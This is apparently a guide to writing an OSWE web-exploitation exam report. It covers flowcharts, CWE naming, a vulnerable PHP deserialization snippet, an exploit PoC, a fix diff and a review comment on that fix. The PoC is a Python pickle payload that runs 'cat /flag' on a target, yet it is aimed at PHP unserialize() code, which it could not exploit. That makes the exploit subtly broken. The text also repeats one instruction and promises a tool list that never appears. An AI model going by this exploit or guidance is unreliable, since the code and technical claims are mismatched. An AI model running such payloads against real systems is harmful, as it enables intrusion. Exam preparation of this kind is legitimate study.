Here’s a structured review of how to write the OSWE exam report, based on common experiences from individuals who have taken the Offensive Security Web Expert (OSWE) certification.
Create a simple ASCII or Mermaid flowchart:
[HTTP Request] → [unsanitized $_GET['file']] → [file_get_contents()] → [LFI]
↓
[MySQL LOAD_FILE()] → [Credentials]
↓
[Admin Login] → [Upload bypass] → [RCE]
Don't write "Login bypass." Write: "Authentication Bypass via PHP Type Juggling (CWE-843)." Use the exact OWASP/CWE terminology. Examiners love this.
4.1 Vulnerability Name & ID
e.g., OSWE-01: PHP Object Injection leading to Remote Code Execution
4.2 Source Code Snippet (THE CRITICAL PART)
Do not paste 100 lines. Paste 10 critical lines with line numbers.
// File: modules/auth/Login.php - Line 42
$user_data = unserialize($_COOKIE['user_prefs']); // <-- Unsafe deserialization
$role = $user_data['role'];
if ($role === 'admin') {
    $this->runHook($_GET['action']);
}
4.3 Proof of Concept (PoC) Exploit Code
# exploit.py
import requests, pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ('cat /flag',))

cookie = {'user_prefs': pickle.dumps(RCE())}
requests.get('http://target/admin/dashboard', cookies=cookie)
4.4 Step-by-Step Exploitation Walkthrough
Create a simple ASCII or Mermaid flowchart.
4.5 Remediation (Code Fix)
Show the exact line change in code.
- $user_data = unserialize($_COOKIE['user_prefs']);
+ $user_data = json_decode($_COOKIE['user_prefs'], true);
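Review bot: On the + line, json_decode() returns null for malformed input and the value still comes from the client-controlled user_prefs cookie, so the $user_data['role'] read in the 4.2 snippet remains attacker-chosen even though object injection is gone. Suggest checking that the decoded result is an array before use, and taking the role from server-side session state (or verifying an HMAC over the cookie) rather than trusting the cookie contents.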
Experienced OSWE candidates use tools to speed up documentation:
However, do not over-automate. A script that generates a "report" without your analysis is worthless. The examiner needs to see your brain working through the source code.